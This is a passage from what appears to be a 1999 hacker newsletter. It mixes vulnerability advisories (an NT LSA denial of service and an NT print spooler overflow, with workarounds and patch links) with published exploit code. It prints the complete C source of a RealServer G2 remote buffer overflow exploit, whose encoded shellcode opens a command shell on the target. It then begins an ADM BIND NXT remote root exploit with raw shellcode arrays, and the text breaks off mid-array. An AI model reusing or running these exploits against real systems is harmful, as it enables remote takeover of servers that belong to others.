reason for this, however, is unfound. Information will be released when it is found. If you come across a situation where a box is impervious to the exploit, PLEASE EMAIL ME. I would really appreciate the entire install history of that particular system. Email to rfp@wiretrip.net. ----[ 2. Solution Well, as previously stated, Luke and ISS informed Microsoft of the LSA vulnerability in February 1999. To be fair, I also reported this exact bug, along with the working exploit, to Microsoft on Oct 25th. Have not hear a word. So, in the meantime, I can recommend two things: - Block port 139 on your firewall. This, however, does not stop internal attack. - Turn off the Server service. While inconvenient, this should be deemed as a temporary solution until Microsoft releases a patch. Just for reference, shutting off the Server service will also shut down the Computer Browser service. Glitch, a fellow Wiretrip member, describes the functions of these services as follows: SERVER: Used as the key to all server-side NetBIOS applications, this service is somewhat needed. Without this service, some of the administrative tools, such as Server Manager, could not be used. If remote administration is not needed, I highly recommend disabling this service. Contrary to popular belief, this service is NOT needed on a webserver. COMPUTER BROWSER: The Computer Browser service is a function within Microsoft networking for gathering and distributing resource information. When active on a server, the server will register its name through a NetBIOS broadcast or directly to a WINS server. So you should note that turning these services off will disable the server from participating in NetBIOS-related functions, including file sharing and remote management. But realistically, how many servers need this? Alternate means of content publishing (for webservers) exist (FTP and -ugh- FrontPage). Of course this leaves the myriad of other services though. I'd be interested to see how MS SQL fairs. It's hoped that between the services.exe and the lsass.exe denial of services, both based on bad RPC code, Microsoft will find this problem worthy of fixing. Now we wait... ----[ 3. Where to Get This Weapon of Mass Destruction I use this title jokingly. But trust me, I have gone back and forth about the release of this exploit. However, as a proponent of full disclosure, I definately will release a working exploit. But I do so with conditions: - I will only release a Windows executable. - The windows executable is coded to reboot (NT) or crash (9x) upon successful execution. If you blow something up, you blow up too. - A few checks that keep the program from running if you run in a user context that does not allow the above 'safety features' to work. But it is a working executable. I'm hoping this will at least curb the script kiddie activity. Of course, I'm sure this program will be reversed and a new version made within 6 hours of posting--but that's not my problem. This should be more than enough to verify/test the exploit, and I've provided the details of how it works and the solutions necessary for stopping it. The skilled will be able to go off this, and the, well, the abusers will hit the glass ceiling as intended. Thanks to Vacuum for helping me come up with a responsible solution. Also, I want to make it very clear, before I tell you where to get the executable.... DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. oh, and DO NOT ASK ME FOR SOURCE. I don't care who you are. All email asking for source will be instantly deleted. I don't care if you send me the secret to life--if it has "p.s. can I get the source?" I will pipe that thing to /dev/null, along with whatever goodies you may have sent me. Don't even joke; you won't get a reply. Now that that's established, you can download RFPoison.exe from my website (of course) at http://www.wiretrip.net/rfp/ ----[ 4. Miscellaneous Updates (Important stuff!) - whisker 1.2.0 has been released! Includes the ability to bounce scans off of AltaVista (thanks to Philip Stoev) Plus some new feature additions, and new scan scripts, including a comprehensive script for scanning FrontPage (thanks to Sozni). - flipz and fuqrag have been busy hacking .gov and .mil sites. Turns out they're using a vanilla copy of msadc2.pl. Check out msadc2.pl (their exploit) at my website. - Zeus Technologies had an outstanding response to RFP9905. In under 12 hours they had a patched version available, and were all-around terrific in their private and public response. As an indication of how they do business, I would recommend Zeus Technologies as a vendor to anyone. Kudos for them. - technotronic and rfp.labs have teamed up! We're going to combine a couple of resources--starting with the mailing list. Technotronic already puts out some good info on his list...now I'll be giving the same list up to date information on rfp.labs advisories, information, and other various cool info. If you're not on it already, you may consider joining. Signup at www.technotronic.com - with the (sad?) end of octoberfest, I'm also pleased to see w00w00 take over with 'w00giving'--all through the month of November w00w00 will be releasing some more stuff! You can start looking for the first (of many) advisories today (Nov 1st). Special greetings to Simple Nomad (and others) on this special day where the wheel finishes its cycle and starts its revolution anew. --- rain forest puppy / rfp@wiretrip.net ----------- ADM / wiretrip --- So what if I'm not elite. My mom says I'm special. --- Advisory RFP9906 ----------------------------- rfp.labs ----------- @HWA 50.0 Realnetworks server bufferoverflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* RealNetworks RealServer G2 buffer overflow exploit * * by dark spyrit * quick unix port by team teso * * the windows binary is available at http://www.beavuh.org. * * This exploits a buffer overflow in RealServers web authentication on * the administrator port - hence the reason the shellcode is base64 encoded. * This has been tested on the NT version with a default installation. * If RealServer is installed in a different directory than the default, the * buffer will need to be adjusted accordingly. * The administrator port is randomly selected at installation, but as you'll * only be testing on your own networks this won't matter :) */ #include #include #include #include #include #include #include #include #include #include #include #include /* local functions */ unsigned long int net_resolve (char *host); int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec); unsigned char sploit[] = "GET /admin/index.html HTTP/1.0\x0d\x0a" "Connection: Keep-Alive\x0d\x0a" "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)\x0d\x0a" "Host: 111.111.11.1:1111\x0d\x0a" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\x0d\x0a" "Accept-Language: en\x0d\x0a" "Accept-Charset: iso-8859-1,*,utf-8\x0d\x0a" "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf" "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E" "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB" "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR" "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9" "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP" "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF" "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/" "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX" "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68" "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf" "84fyZ/////w==\x0d\x0a\x0d\x0a\x00"; int main (int argc, char **argv) { int socket; char *server; unsigned short int port; struct sockaddr_in sa; if (argc != 3) { printf ("RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.\n" "by dark spyrit , port by team teso\n\n" "usage: %s \n" "eg - %s host.com 6666\n" "the exploit will spawn a command prompt on port 6968\n\n", argv[0], argv[0]); exit (EXIT_FAILURE); } server = argv[1]; port = atoi (argv[2]); socket = net_connect (&sa, server, port, 45); if (socket <= 0) { perror ("net_connect"); exit (EXIT_FAILURE); } write (socket, sploit, strlen (sploit)); sleep (1); close (socket); printf ("data sent. try \"telnet %s 6968\" now \n", server); exit (EXIT_SUCCESS); } unsigned long int net_resolve (char *host) { long i; struct hostent *he; i = inet_addr (host); if (i == -1) { he = gethostbyname (host); if (he == NULL) { return (0); } else { return (*(unsigned long *) he->h_addr); } } return (i); } int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec) { int n, len, error, flags; int fd; struct timeval tv; fd_set rset, wset; /* first allocate a socket */ cs->sin_family = AF_INET; cs->sin_port = htons (port); fd = socket (cs->sin_family, SOCK_STREAM, 0); if (fd == -1) return (-1); cs->sin_addr.s_addr = net_resolve (server); if (cs->sin_addr.s_addr == 0) { close (fd); return (-1); } flags = fcntl (fd, F_GETFL, 0); if (flags == -1) { close (fd); return (-1); } n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); if (n == -1) { close (fd); return (-1); } error = 0; n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); if (n < 0) { if (errno != EINPROGRESS) { close (fd); return (-1); } } if (n == 0) goto done; FD_ZERO(&rset); FD_ZERO(&wset); FD_SET(fd, &rset); FD_SET(fd, &wset); tv.tv_sec = sec; tv.tv_usec = 0; n = select(fd + 1, &rset, &wset, NULL, &tv); if (n == 0) { close(fd); errno = ETIMEDOUT; return (-1); } if (n == -1) return (-1); if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { len = sizeof(error); if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { errno = ETIMEDOUT; return (-1); } if (error == 0) { goto done; } else { errno = error; return (-1); } } } else return (-1); done: n = fcntl(fd, F_SETFL, flags); if (n == -1) return (-1); return (fd); } @HWA 51.0 NT Print spooler vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Printer (spooler) Service Vulnerabilities Systems Affected: Any NT system with a printer or the ability to print to a network printer. Microsoft Windows NT 4.0 Workstation, Server, Terminal Server (all service packs) Release Date: November 4, 1999 Advisory Code: AD11041999 Description: It was a typical day in eEye land... the beer was cold, the day was long, the exploit... well the exploit was a joke started by a client. "The day you guys can hack my network via it's printer is the day I call it quits." A joke at first... the ability to remotely and locally compromise an NT network via a printer. What started off as a joke was going to turn into reality. Ten or so minutes after taking a look at the NT printer service we had already found a way to compromise any windows NT server or workstation that had a printer attached to it or the ability to print to a network printer. The Windows NT Spooler service (Spoolss.exe), (used for various printing activities), contains a number of security holes that allow for data overflows. These vulnerabilities are evident when someone passes data to various spooler service API's and spoolss.exe does not check the size of the receiving buffer to make sure it can hold the incoming data. The API, explained in more detail below, can only be exploited locally. However, some of the overflows could be exploited remotely. Example of one of the exploitable API's: First thing to note about the API in question is that it can only be executed if you are a "Power User". So for this example, if you were to write exploit code for this API overflow you could only elevate your access from a Power User to SYSTEM level. Which is still a very bad thing. However, as explained earlier, there are other places where the spooler service overflows and cases that do not require you to be at the power user level. ----spoolss.c---- #include #include int main() { char bigbuffer[3000]; int i; strcpy(bigbuffer,"\\\\"); for(i=0;i<2000;i++) strcat(bigbuffer,"A"); AddPrintProcessor(NULL,NULL,bigbuffer,bigbuffer); return(0); } ----spoolss.c---- In this example, the overflow is in AddPrintProcessor. When "bigbuffer" is passed to the spooler service, it tries to stuff 2000 instances of the character "A" into a buffer that cannot handle an amount of data that size and therefore overflows. Also you will notice when it overflows that EIP is 00410041. This is because the bytes have been changed into wide byte (Unicode) format. Do not be deceived by this... it is still exploitable. :-] There exists another vulnerability in the spooler service that allows any local user to load their own dll's and have them executed by the spooler service with SYSTEM level access therefore allowing any local user to gain total control of the local machine. The vulnerability is in AddPrintProvidor(). Microsoft has a very good description in their advisory of what a print provider is and why the vulnerability exists and other detailed information. So instead of regurgitating that information we will give you detailed information on exploiting the hole and an example exploit including source. http://www.eeye.com/html/Advisories/spoolsploit.zip A brief word about w00giving: w00giving is being put on by none other then the security team w00w00. w00giving is a joint effort of various security groups and individuals who are going to be releasing advisories,exploits and tools through out November and into December. eEye is participating in w00giving so over the next few weeks of November we plan to release either an advisory or tool once a week. This printer advisory is our first offering and we hope you enjoy it. Fixes: X86: http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-U S/Q243649.exe Alpha: http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/ALPHA/EN -US/Q243649.exe Windows NT 4.0 Server, Terminal Server Edition: To be released shortly Related Links: Retina - The Network Security Scanner http://www.eEye.com/retina/ Smarter. Faster. Sexier. w00w00 - w00giving http://www.datasurge.net/www.w00w00.org/ Greetings: Attrition,w00w00,beavuh,ADM,Rhino9,L0pht,Wiretrip, and HNN. krystalia 1971-1999 Copyright (c) 1999 eEye Digital Security Team Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please e-mail alert@eEye.com for permission. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Please send suggestions, updates, and comments to: eEye Digital Security Team info@eEye.com www.eEye.com @HWA 52.0 Bind remote exploit (ADM) ~~~~~~~~~~~~~~~~~~~~~~~~~ Note: "We broke this just a little in order to raise the bar on using it (just slightly).. If you'd like to test it on your own box, put a shell in /adm/sh, or /adm/ksh for solaris on the target machine." /* * ADM CONFIDENTIAL -- (ADM Confidential Restricted when * combined with the aggregated modules for this product) * OBJECT CODE ONLY SOURCE MATERIALS * (C) COPYRIGHT ADM Crew. 1999 * All Rights Reserved * * This module may not be used, published, distributed or archived without * the written permission of the ADM Crew. Please contact your local sales * representative. * * ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez * * "a misanthropic anthropoid with nothing to say" * * thanks to stran9er for sdnsofw.c * * Intel exploitation is pretty straightforward.. should give you a remote * shell. The shellcode will break chroot, do a getpeername on all open * sockets, and dup to the first one that returns AFINET. It also forks and * runs a command in case the fd duping doesn't go well. Solaris/SPARC is a * bit more complicated.. we are going through a well trodden part of the * code, so we don't get the context switch we need to have it populate the * register windows from the stack. However, if you just hammer the service * with requests, you will quickly get a context switch at the right time. * Thus, the SPARC shellcode currently only breaks chroot, closes current * fd's and runs a command. * Also, the NetBSD shellcode doesn't break chroot because they stop the * dir tricks. Of course, they allow mknods in chrooted environments, so * if named is running as root, then it still might be expoitable. * The non-exec stack patch version returns into a malloc'ed buffer, whose * address can vary quite alot. Thus, it may not be as reliable as the other * versions.. * * We broke this just a little in order to raise the bar on using it * (just slightly).. If you'd like to test it on your own box, put a shell * in /adm/sh, or /adm/ksh for solaris on the target machine. */ #include #include #include #include #include #include #include #include #include #include #include #include #include char linuxcode[]= {0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x61,0x64,0x6d,0x2f, 0x73,0x68,0x0,0x2d,0x63,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x70,0x6c,0x61,0x67,0x75,0x65,0x7a,0x5b, 0x41,0x44,0x4d,0x5d,0x31,0x30,0x2f,0x39,0x39,0x2d}; char sc[]= {0x40,0x0,0x0,0x2e,0x1,0x0,0x0,0x0,0x90,0x3,0xe0,0xd5,0x92,0x10,0x20,0x0, 0x82,0x10,0x20,0x5,0x91,0xd0,0x20,0x0,0xa0,0x10,0x0,0x8,0x90,0x3,0xe0,0xcc, 0x92,0x10,0x21,0xff,0x82,0x10,0x20,0x50,0x91,0xd0,0x20,0x0,0x90,0x3,0xe0, 